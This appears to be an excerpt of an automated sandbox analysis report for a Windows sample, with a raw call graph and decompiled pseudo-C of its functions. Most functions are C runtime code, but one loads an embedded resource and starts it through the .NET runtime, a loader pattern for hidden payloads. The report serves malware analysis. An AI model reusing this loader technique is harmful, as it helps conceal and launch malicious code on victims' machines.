8031 4062a0 ___std_exception_copy 41 API calls 8030->8031 8031->8032 8032->7981 8036 406035 8044 408463 8036->8044 8039 405ee1 ___std_exception_copy 14 API calls 8040 406051 8039->8040 8041 40605e 8040->8041 8049 406061 8040->8049 8043 406049 8045 40839e _unexpected 5 API calls 8044->8045 8046 40847f 8045->8046 8047 408497 TlsAlloc 8046->8047 8048 40603f 8046->8048 8047->8048 8048->8039 8048->8043 8050 40606b 8049->8050 8052 406071 8049->8052 8053 4084a2 8050->8053 8052->8043 8054 40839e _unexpected 5 API calls 8053->8054 8055 4084be 8054->8055 8056 4084c7 8055->8056 8057 4084d9 TlsFree 8055->8057 8056->8052 9248 40c1b5 9250 40c1dd 9248->9250 9249 40c215 9250->9249 9251 40c207 9250->9251 9252 40c20e 9250->9252 9253 40c287 20 API calls 9251->9253 9257 40c270 9252->9257 9255 40c20c 9253->9255 9258 40c290 9257->9258 9259 40c708 __startOneArgErrorHandling 20 API calls 9258->9259 9260 40c213 9259->9260 9261 4037b5 9262 4037cc 9261->9262 9263 40579a CallUnexpected 41 API calls 9262->9263 9264 4037d1 __FrameHandler3::FrameUnwindToState 9263->9264 9265 403694 __InternalCxxFrameHandler 41 API calls 9264->9265 9266 403806 __InternalCxxFrameHandler ___AdjustPointer 9265->9266 9267 403fb5 9268 404537 ___std_exception_destroy 14 API calls 9267->9268 9269 403fc4 9268->9269 8622 40c4b7 8623 40c4d0 __startOneArgErrorHandling 8622->8623 8625 40c521 __startOneArgErrorHandling 8623->8625 8626 40c860 8623->8626 8627 40c899 __startOneArgErrorHandling 8626->8627 8628 40c8c0 __startOneArgErrorHandling 8627->8628 8629 40cbd1 __raise_exc RaiseException 8627->8629 8630 40c903 8628->8630 8631 40c8de 8628->8631 8629->8628 8632 40cec2 __startOneArgErrorHandling 14 API calls 8630->8632 8637 40cef3 8631->8637 8634 40c8fe __startOneArgErrorHandling 8632->8634 8635 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8634->8635 8636 40c927 8635->8636 8636->8625 8638 40cf00 8637->8638 8639 40cf0f __startOneArgErrorHandling 8638->8639 8640 40cf3e __startOneArgErrorHandling 8638->8640 8641 40cec2 __startOneArgErrorHandling 14 API calls 8639->8641 8643 40cf8c 8640->8643 8644 40cec2 __startOneArgErrorHandling 14 API calls 8640->8644 8642 40cf28 8641->8642 8642->8634 8643->8634 8644->8643 8645 408eb9 8655 408de8 8645->8655 8649 408ec6 8668 40ab07 8649->8668 8652 408ef0 8653 40650b ___free_lconv_mon 14 API calls 8652->8653 8654 408efb 8653->8654 8672 408c79 8655->8672 8658 40aa5c 8659 40aa68 __FrameHandler3::FrameUnwindToState 8658->8659 8886 407596 EnterCriticalSection 8659->8886 8661 40aadf 8893 40aafe 8661->8893 8662 40aa73 8662->8661 8664 40aab3 DeleteCriticalSection 8662->8664 8887 40b059 8662->8887 8667 40650b ___free_lconv_mon 14 API calls 8664->8667 8667->8662 8669 408ed5 DeleteCriticalSection 8668->8669 8670 40ab1e 8668->8670 8669->8649 8669->8652 8670->8669 8671 40650b ___free_lconv_mon 14 API calls 8670->8671 8671->8669 8675 408bcd 8672->8675 8676 408bd9 __FrameHandler3::FrameUnwindToState 8675->8676 8683 407596 EnterCriticalSection 8676->8683 8678 408be3 ___scrt_uninitialize_crt 8679 408c4f 8678->8679 8684 408b41 8678->8684 8692 408c6d 8679->8692 8683->8678 8685 408b4d __FrameHandler3::FrameUnwindToState 8684->8685 8695 408f05 EnterCriticalSection 8685->8695 8687 408b57 ___scrt_uninitialize_crt 8688 408ba3 8687->8688 8696 408d83 8687->8696 8709 408bc1 8688->8709 8885 4075de LeaveCriticalSection 8692->8885 8694 408c5b 8694->8658 8695->8687 8697 408d98 ___std_exception_copy 8696->8697 8698 408daa 8697->8698 8699 408d9f 8697->8699 8712 408d1a 8698->8712 8700 408c79 ___scrt_uninitialize_crt 70 API calls 8699->8700 8708 408da5 8700->8708 8703 405850 ___std_exception_copy 41 API calls 8705 408de2 8703->8705 8705->8688 8706 408dcb 8725 409f10 8706->8725 8708->8703 8884 408f19 LeaveCriticalSection 8709->8884 8711 408baf 8711->8678 8713 408d33 8712->8713 8717 408d5a 8712->8717 8714 409562 ___scrt_uninitialize_crt 41 API calls 8713->8714 8713->8717 8715 408d4f 8714->8715 8736 40a72f 8715->8736 8717->8708 8718 409562 8717->8718 8719 409583 8718->8719 8720 40956e 8718->8720 8719->8706 8721 40649b ___std_exception_copy 14 API calls 8720->8721 8722 409573 8721->8722 8723 4062a0 ___std_exception_copy 41 API calls 8722->8723 8724 40957e 8723->8724 8724->8706 8726 409f21 8725->8726 8727 409f2e 8725->8727 8728 40649b ___std_exception_copy 14 API calls 8726->8728 8729 409f77 8727->8729 8732 409f55 8727->8732 8734 409f26 8728->8734 8730 40649b ___std_exception_copy 14 API calls 8729->8730 8731 409f7c 8730->8731 8733 4062a0 ___std_exception_copy 41 API calls 8731->8733 8850 409e6e 8732->8850 8733->8734 8734->8708 8737 40a73b __FrameHandler3::FrameUnwindToState 8736->8737 8738 40a77c 8737->8738 8739 40a7c2 8737->8739 8746 40a743 8737->8746 8740 406223 ___std_exception_copy 41 API calls 8738->8740 8747 40778f EnterCriticalSection 8739->8747 8740->8746 8742 40a7c8 8743 40a7e6 8742->8743 8748 40a840 8742->8748 8774 40a838 8743->8774 8746->8717 8747->8742 8749 40a868 8748->8749 8772 40a88b ___scrt_uninitialize_crt 8748->8772 8750 40a86c 8749->8750 8752 40a8c7 8749->8752 8751 406223 ___std_exception_copy 41 API calls 8750->8751 8751->8772 8753 40a8e5 8752->8753 8777 40aee4 8752->8777 8780 40a3bc 8753->8780 8757 40a944 8761 40a958 8757->8761 8762 40a9ad WriteFile 8757->8762 8758 40a8fd 8759 40a905 8758->8759 8760 40a92c 8758->8760 8759->8772 8787 40a354 8759->8787 8792 409f8d GetConsoleOutputCP 8760->8792 8765 40a960 8761->8765 8766 40a999 8761->8766 8764 40a9cf GetLastError 8762->8764 8762->8772 8764->8772 8769 40a985 8765->8769 8770 40a965 8765->8770 8820 40a439 8766->8820 8812 40a5fd 8769->8812 8770->8772 8805 40a514 8770->8805 8772->8743 8849 4077b2 LeaveCriticalSection 8774->8849 8776 40a83e 8776->8746 8827 40ae61 8777->8827 8779 40aefd 8779->8753 8833 40ab47 8780->8833 8782 40a3ce 8783 40a432 8782->8783 8784 40a3fc 8782->8784 8842 405940 8782->8842 8783->8757 8783->8758 8784->8783 8786 40a416 GetConsoleMode 8784->8786 8786->8783 8788 40a3ab 8787->8788 8790 40a376 8787->8790 8788->8772 8789 40af02 5 API calls ___scrt_uninitialize_crt 8789->8790 8790->8788 8790->8789 8791 40a3ad GetLastError 8790->8791 8791->8788 8793 409fff 8792->8793 8798 40a006 __InternalCxxFrameHandler 8792->8798 8794 405940 ___scrt_uninitialize_crt 41 API calls 8793->8794 8794->8798 8795 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8796 40a34d 8795->8796 8796->8772 8797 40942f 42 API calls ___scrt_uninitialize_crt 8797->8798 8798->8797 8799 40a2bc 8798->8799 8800 407464 ___scrt_uninitialize_crt WideCharToMultiByte 8798->8800 8801 40a235 WriteFile 8798->8801 8802 40ad3d 5 API calls ___scrt_uninitialize_crt 8798->8802 8804 40a273 WriteFile 8798->8804 8799->8795 8799->8799 8800->8798 8801->8798 8803 40a32b GetLastError 8801->8803 8802->8798 8803->8799 8804->8798 8804->8803 8810 40a523 ___scrt_uninitialize_crt 8805->8810 8806 40a5e2 8807 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8806->8807 8811 40a5fb 8807->8811 8808 40a598 WriteFile 8809 40a5e4 GetLastError 8808->8809 8808->8810 8809->8806 8810->8806 8810->8808 8811->8772 8819 40a60c ___scrt_uninitialize_crt 8812->8819 8813 40a714 8814 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8813->8814 8815 40a72d 8814->8815 8815->8772 8816 407464 ___scrt_uninitialize_crt WideCharToMultiByte 8816->8819 8817 40a716 GetLastError 8817->8813 8818 40a6cb WriteFile 8818->8817 8818->8819 8819->8813 8819->8816 8819->8817 8819->8818 8826 40a448 ___scrt_uninitialize_crt 8820->8826 8821 40a4f9 8822 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8821->8822 8823 40a512 8822->8823 8823->8772 8824 40a4b8 WriteFile 8825 40a4fb GetLastError 8824->8825 8824->8826 8825->8821 8826->8821 8826->8824 8828 407866 ___scrt_uninitialize_crt 41 API calls 8827->8828 8829 40ae73 8828->8829 8830 40ae8f SetFilePointerEx 8829->8830 8832 40ae7b ___scrt_uninitialize_crt 8829->8832 8831 40aea7 GetLastError 8830->8831 8830->8832 8831->8832 8832->8779 8834 40ab61 8833->8834 8835 40ab54 8833->8835 8838 40ab6d 8834->8838 8839 40649b ___std_exception_copy 14 API calls 8834->8839 8836 40649b ___std_exception_copy 14 API calls 8835->8836 8837 40ab59 8836->8837 8837->8782 8838->8782 8840 40ab8e 8839->8840 8841 4062a0 ___std_exception_copy 41 API calls 8840->8841 8841->8837 8843 4058e0 ___std_exception_copy 41 API calls 8842->8843 8844 405950 8843->8844 8845 4093a0 ___scrt_uninitialize_crt 41 API calls 8844->8845 8846 40596d 8845->8846 8847 4093fe ___scrt_uninitialize_crt 41 API calls 8846->8847 8848 40597a 8847->8848 8848->8784 8849->8776 8851 409e7a __FrameHandler3::FrameUnwindToState 8850->8851 8863 40778f EnterCriticalSection 8851->8863 8853 409e89 8861 409ece 8853->8861 8864 407866 8853->8864 8854 40649b ___std_exception_copy 14 API calls 8857 409ed5 8854->8857 8856 409eb5 FlushFileBuffers 8856->8857 8858 409ec1 GetLastError 8856->8858 8880 409f04 8857->8880 8877 406488 8858->8877 8861->8854 8863->8853 8865 407873 8864->8865 8868 407888 8864->8868 8866 406488 ___scrt_uninitialize_crt 14 API calls 8865->8866 8867 407878 8866->8867 8870 40649b ___std_exception_copy 14 API calls 8867->8870 8869 406488 ___scrt_uninitialize_crt 14 API calls 8868->8869 8871 4078ad 8868->8871 8872 4078b8 8869->8872 8873 407880 8870->8873 8871->8856 8874 40649b ___std_exception_copy 14 API calls 8872->8874 8873->8856 8875 4078c0 8874->8875 8876 4062a0 ___std_exception_copy 41 API calls 8875->8876 8876->8873 8878 405ee1 ___std_exception_copy 14 API calls 8877->8878 8879 40648d 8878->8879 8879->8861 8883 4077b2 LeaveCriticalSection 8880->8883 8882 409eed 8882->8734 8883->8882 8884->8711 8885->8694 8886->8662 8888 40b06c ___std_exception_copy 8887->8888 8896 40af34 8888->8896 8890 40b078 8891 405850 ___std_exception_copy 41 API calls 8890->8891 8892 40b084 8891->8892 8892->8662 8968 4075de LeaveCriticalSection 8893->8968 8895 40aaeb 8895->8649 8897 40af40 __FrameHandler3::FrameUnwindToState 8896->8897 8898 40af4a 8897->8898 8899 40af6d 8897->8899 8900 406223 ___std_exception_copy 41 API calls 8898->8900 8901 40af65 8899->8901 8907 408f05 EnterCriticalSection 8899->8907 8900->8901 8901->8890 8903 40af8b 8908 40afcb 8903->8908 8905 40af98 8922 40afc3 8905->8922 8907->8903 8909 40afd8 8908->8909 8910 40affb 8908->8910 8911 406223 ___std_exception_copy 41 API calls 8909->8911 8912 408d1a ___scrt_uninitialize_crt 66 API calls 8910->8912 8920 40aff3 8910->8920 8911->8920 8913 40b013 8912->8913 8914 40ab07 14 API calls 8913->8914 8915 40b01b 8914->8915 8916 409562 ___scrt_uninitialize_crt 41 API calls 8915->8916 8917 40b027 8916->8917 8925 40b84c 8917->8925 8920->8905 8921 40650b ___free_lconv_mon 14 API calls 8921->8920 8967 408f19 LeaveCriticalSection 8922->8967 8924 40afc9 8924->8901 8927 40b02e 8925->8927 8928 40b875 8925->8928 8926 40b8c4 8929 406223 ___std_exception_copy 41 API calls 8926->8929 8927->8920 8927->8921 8928->8926 8930 40b89c 8928->8930 8929->8927 8932 40b7bb 8930->8932 8933 40b7c7 __FrameHandler3::FrameUnwindToState 8932->8933 8940 40778f EnterCriticalSection 8933->8940 8935 40b7d5 8936 40b806 8935->8936 8941 40b8ef 8935->8941 8954 40b840 8936->8954 8940->8935 8942 407866 ___scrt_uninitialize_crt 41 API calls 8941->8942 8945 40b8ff 8942->8945 8943 40b905 8957 4077d5 8943->8957 8945->8943 8947 407866 ___scrt_uninitialize_crt 41 API calls 8945->8947 8953 40b937 8945->8953 8946 407866 ___scrt_uninitialize_crt 41 API calls 8949 40b943 CloseHandle 8946->8949 8948 40b92e 8947->8948 8951 407866 ___scrt_uninitialize_crt 41 API calls 8948->8951 8949->8943 8952 40b94f GetLastError 8949->8952 8950 40b95d ___scrt_uninitialize_crt 8950->8936 8951->8953 8952->8943 8953->8943 8953->8946 8966 4077b2 LeaveCriticalSection 8954->8966 8956 40b829 8956->8927 8958 4077e4 8957->8958 8959 40784b 8957->8959 8958->8959 8965 40780e 8958->8965 8960 40649b ___std_exception_copy 14 API calls 8959->8960 8961 407850 8960->8961 8962 406488 ___scrt_uninitialize_crt 14 API calls 8961->8962 8963 40783b 8962->8963 8963->8950 8964 407835 SetStdHandle 8964->8963 8965->8963 8965->8964 8966->8956 8967->8924 8968->8895 8058 40183b 8061 404560 8058->8061 8062 405ee1 ___std_exception_copy 14 API calls 8061->8062 8063 40184c 8062->8063 9147 40513b 9150 4050c2 9147->9150 9151 4050ce __FrameHandler3::FrameUnwindToState 9150->9151 9158 407596 EnterCriticalSection 9151->9158 9153 4050d8 9154 405106 9153->9154 9157 40824f ___scrt_uninitialize_crt 14 API calls 9153->9157 9159 405124 9154->9159 9157->9153 9158->9153 9162 4075de LeaveCriticalSection 9159->9162 9161 405112 9162->9161 9270 4055bf 9271 40650b ___free_lconv_mon 14 API calls 9270->9271 9272 4055cd 9271->9272 9273 40650b ___free_lconv_mon 14 API calls 9272->9273 9274 4055e0 9273->9274 9275 40650b ___free_lconv_mon 14 API calls 9274->9275 9276 4055f1 9275->9276 9277 40650b ___free_lconv_mon 14 API calls 9276->9277 9278 405602 9277->9278

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E0040147B() {
                      				void* _v8;
                      				struct HRSRC__* _t4;
                      				long _t10;
                      				struct HRSRC__* _t12;
                      				void* _t16;
                      
                      				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                      				_t12 = _t4;
                      				if(_t12 == 0) {
                      					L6:
                      					ExitProcess(0);
                      				}
                      				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                      				if(_t16 != 0) {
                      					_v8 = LockResource(_t16);
                      					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                      					_t13 = _v8;
                      					if(_v8 != 0 && _t10 != 0) {
                      						L00401000(_t13, _t10); // executed
                      					}
                      				}
                      				FreeResource(_t16);
                      				goto L6;
                      			}








                      0x00401491
                      0x00401497
                      0x0040149b
                      0x004014de
                      0x004014e0
                      0x004014e0
                      0x004014a9
                      0x004014ad
                      0x004014b9
                      0x004014bf
                      0x004014c5
                      0x004014ca
                      0x004014d2
                      0x004014d2
                      0x004014ca
                      0x004014d8
                      0x00000000

                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040148E
                      • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 00401491
                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014A0
                      • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014A3
                      • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014B0
                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014BC
                      • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014BF
                        • Part of subcall function 0040147B: CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                      • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014D8
                      • ExitProcess.KERNEL32 ref: 004014E0
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                      • String ID: v4.0.30319
                      • API String ID: 2372384083-3152434051
                      • Opcode ID: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                      • Instruction ID: 1025187115c16df301aa5e6fb14f5cc9936e15f8599d421e9e42fb84dc5f9529
                      • Opcode Fuzzy Hash: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                      • Instruction Fuzzy Hash: D4F04470A0131477EB202BF34D4DF2B755C9F85746F040874F601BA2A0CAB4DC008679
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 56 401e16-401e21 SetUnhandledExceptionFilter
                      C-Code - Quality: 100%
                      			E00401E16() {
                      				_Unknown_base(*)()* _t1;
                      
                      				_t1 = SetUnhandledExceptionFilter(E00401E22); // executed
                      				return _t1;
                      			}




                      0x00401e1b
                      0x00401e21

                      APIs
                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E22,0040170D), ref: 00401E1B
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                      • Instruction ID: 1700cd800284021a96fa1165edcf07aa52b884b6f150888f85792e917e9d8571
                      • Opcode Fuzzy Hash: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                      • Instruction Fuzzy Hash:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E00407507() {
                      				WCHAR* _t1;
                      				void* _t3;
                      				void* _t17;
                      				WCHAR* _t19;
                      
                      				_t1 = GetEnvironmentStringsW();
                      				_t19 = _t1;
                      				if(_t19 != 0) {
                      					_t11 = E004074D0(_t19) - _t19 & 0xfffffffe;
                      					_t3 = E00407D48(E004074D0(_t19) - _t19 & 0xfffffffe); // executed
                      					_t17 = _t3;
                      					if(_t17 != 0) {
                      						E00403120(_t17, _t19, _t11);
                      					}
                      					E0040650B(0);
                      					FreeEnvironmentStringsW(_t19);
                      					return _t17;
                      				} else {
                      					return _t1;
                      				}
                      			}







                      0x0040750a
                      0x00407510
                      0x00407514
                      0x00407524
                      0x00407528
                      0x0040752d
                      0x00407533
                      0x00407538
                      0x0040753d
                      0x00407542
                      0x00407549
                      0x00407554
                      0x00407517
                      0x00407517
                      0x00407517

                      APIs
                      • GetEnvironmentStringsW.KERNEL32(?,00404A94), ref: 0040750A
                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00404A94), ref: 00407549
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free
                      • String ID:
                      • API String ID: 3328510275-0
                      • Opcode ID: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                      • Instruction ID: b1f7f09f612f60460f80359e47cfd29f29434f3d7477643bc4f3bdfe63dfc6bb
                      • Opcode Fuzzy Hash: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                      • Instruction Fuzzy Hash: 44E09B3754D63136D112323A7C4999F1A0DCFC6679715023BF4147A2C5EE789D0200EE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 21 5d70d50-5d70dbc 25 5d70dbe-5d70dc7 21->25 26 5d70dc9-5d70ddd 21->26 29 5d70e05-5d70e07 25->29 32 5d70ddf-5d70df7 26->32 33 5d70df9-5d70e03 26->33 31 5d70e0f-5d70e3d GetCurrentThreadId 29->31 34 5d70e46-5d70e6b 31->34 35 5d70e3f-5d70e45 31->35 36 5d70e6d-5d70e71 32->36 33->29 34->36 35->34 37 5d70e73 36->37 38 5d70e7c 36->38 37->38
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 05D70E29
                      Memory Dump Source
                      • Source File: 00000002.00000002.508357621.0000000005D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: true
                      • Associated: 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_5d60000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: CurrentThread
                      • String ID:
                      • API String ID: 2882836952-0
                      • Opcode ID: a450498328f0c844655a001993c888d05ea78cb2501cb3062ca790defedd2f82
                      • Instruction ID: ef15973dff4cec33fe33e6b1cf0efc7cd203e700340dbf57535eece185da54a6
                      • Opcode Fuzzy Hash: a450498328f0c844655a001993c888d05ea78cb2501cb3062ca790defedd2f82
                      • Instruction Fuzzy Hash: C3316C74E04218DFDB24DF69D488BAEBBF5EF48714F14841AE406A7390DB749845CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 41 407d48-407d54 42 407d86-407d91 call 40649b 41->42 43 407d56-407d58 41->43 50 407d93-407d95 42->50 45 407d71-407d82 RtlAllocateHeap 43->45 46 407d5a-407d5b 43->46 47 407d84 45->47 48 407d5d-407d64 call 4051c4 45->48 46->45 47->50 48->42 53 407d66-407d6f call 4087b5 48->53 53->42 53->45
                      C-Code - Quality: 100%
                      			E00407D48(long _a4) {
                      				void* _t4;
                      				void* _t6;
                      				long _t8;
                      
                      				_t8 = _a4;
                      				if(_t8 > 0xffffffe0) {
                      					L7:
                      					 *((intOrPtr*)(E0040649B())) = 0xc;
                      					__eflags = 0;
                      					return 0;
                      				}
                      				if(_t8 == 0) {
                      					_t8 = _t8 + 1;
                      				}
                      				while(1) {
                      					_t4 = RtlAllocateHeap( *0x4163ec, 0, _t8); // executed
                      					if(_t4 != 0) {
                      						break;
                      					}
                      					__eflags = E004051C4();
                      					if(__eflags == 0) {
                      						goto L7;
                      					}
                      					_t6 = E004087B5(__eflags, _t8);
                      					__eflags = _t6;
                      					if(_t6 == 0) {
                      						goto L7;
                      					}
                      				}
                      				return _t4;
                      			}






                      0x00407d4e
                      0x00407d54
                      0x00407d86
                      0x00407d8b
                      0x00407d91
                      0x00000000
                      0x00407d91
                      0x00407d58
                      0x00407d5a
                      0x00407d5a
                      0x00407d71
                      0x00407d7a
                      0x00407d82
                      0x00000000
                      0x00000000
                      0x00407d62
                      0x00407d64
                      0x00000000
                      0x00000000
                      0x00407d67
                      0x00407d6d
                      0x00407d6f
                      0x00000000
                      0x00000000
                      0x00407d6f
                      0x00000000

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00406E77,?,?,00406E77,00000220,?,00000000,?), ref: 00407D7A
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                      • Instruction ID: 65cd16bcdc1b8bd721fcda30d9bca64849d6530a3f0c9080c4415b1d98ca3938
                      • Opcode Fuzzy Hash: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                      • Instruction Fuzzy Hash: 9FE0A931A0862456EA202B269C00F6B3A498F823B0B154233EC05B62D2DA7DE80182AF
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00401C83(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                      				char _v0;
                      				struct _EXCEPTION_POINTERS _v12;
                      				intOrPtr _v80;
                      				intOrPtr _v88;
                      				char _v92;
                      				intOrPtr _v608;
                      				intOrPtr _v612;
                      				void* _v616;
                      				intOrPtr _v620;
                      				char _v624;
                      				intOrPtr _v628;
                      				intOrPtr _v632;
                      				intOrPtr _v636;
                      				intOrPtr _v640;
                      				intOrPtr _v644;
                      				intOrPtr _v648;
                      				intOrPtr _v652;
                      				intOrPtr _v656;
                      				intOrPtr _v660;
                      				intOrPtr _v664;
                      				intOrPtr _v668;
                      				char _v808;
                      				char* _t39;
                      				long _t49;
                      				intOrPtr _t51;
                      				void* _t54;
                      				intOrPtr _t55;
                      				intOrPtr _t57;
                      				intOrPtr _t58;
                      				intOrPtr _t59;
                      				intOrPtr* _t60;
                      
                      				_t59 = __esi;
                      				_t58 = __edi;
                      				_t57 = __edx;
                      				if(IsProcessorFeaturePresent(0x17) != 0) {
                      					_t55 = _a4;
                      					asm("int 0x29");
                      				}
                      				E00401E78(_t34);
                      				 *_t60 = 0x2cc;
                      				_v632 = E00402470(_t58,  &_v808, 0, 3);
                      				_v636 = _t55;
                      				_v640 = _t57;
                      				_v644 = _t51;
                      				_v648 = _t59;
                      				_v652 = _t58;
                      				_v608 = ss;
                      				_v620 = cs;
                      				_v656 = ds;
                      				_v660 = es;
                      				_v664 = fs;
                      				_v668 = gs;
                      				asm("pushfd");
                      				_pop( *_t15);
                      				_v624 = _v0;
                      				_t39 =  &_v0;
                      				_v612 = _t39;
                      				_v808 = 0x10001;
                      				_v628 =  *((intOrPtr*)(_t39 - 4));
                      				E00402470(_t58,  &_v92, 0, 0x50);
                      				_v92 = 0x40000015;
                      				_v88 = 1;
                      				_v80 = _v0;
                      				_t28 = IsDebuggerPresent() - 1; // -1
                      				_v12.ExceptionRecord =  &_v92;
                      				asm("sbb bl, bl");
                      				_v12.ContextRecord =  &_v808;
                      				_t54 =  ~_t28 + 1;
                      				SetUnhandledExceptionFilter(0);
                      				_t49 = UnhandledExceptionFilter( &_v12);
                      				if(_t49 == 0 && _t54 == 0) {
                      					_push(3);
                      					return E00401E78(_t49);
                      				}
                      				return _t49;
                      			}


































                      0x00401c83
                      0x00401c83
                      0x00401c83
                      0x00401c97
                      0x00401c99
                      0x00401c9c
                      0x00401c9c
                      0x00401ca0
                      0x00401ca5
                      0x00401cbd
                      0x00401cc3
                      0x00401cc9
                      0x00401ccf
                      0x00401cd5
                      0x00401cdb
                      0x00401ce1
                      0x00401ce8
                      0x00401cef
                      0x00401cf6
                      0x00401cfd
                      0x00401d04
                      0x00401d0b
                      0x00401d0c
                      0x00401d15
                      0x00401d1b
                      0x00401d1e
                      0x00401d24
                      0x00401d33
                      0x00401d3f
                      0x00401d4a
                      0x00401d51
                      0x00401d58
                      0x00401d63
                      0x00401d6b
                      0x00401d74
                      0x00401d76
                      0x00401d79
                      0x00401d7b
                      0x00401d85
                      0x00401d8d
                      0x00401d93
                      0x00000000
                      0x00401d9a
                      0x00401d9d

                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401C8F
                      • IsDebuggerPresent.KERNEL32 ref: 00401D5B
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401D7B
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00401D85
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                      • Instruction ID: 03da4fdce737ae66b50b035683398d13283d912606226935be00c523356d6f7c
                      • Opcode Fuzzy Hash: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                      • Instruction Fuzzy Hash: F4314C75D0131C9BDB10DF61D949BCDBBB8BF08304F1041AAE44CAB290EB745A848F48
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 88%
                      			E0040207B(signed int __edx) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				intOrPtr _t60;
                      				signed int _t61;
                      				signed int _t62;
                      				signed int _t63;
                      				signed int _t66;
                      				signed int _t67;
                      				signed int _t73;
                      				intOrPtr _t74;
                      				intOrPtr _t75;
                      				intOrPtr* _t77;
                      				signed int _t78;
                      				intOrPtr* _t82;
                      				signed int _t85;
                      				signed int _t90;
                      				intOrPtr* _t93;
                      				signed int _t96;
                      				signed int _t99;
                      				signed int _t104;
                      
                      				_t90 = __edx;
                      				 *0x415c64 =  *0x415c64 & 0x00000000;
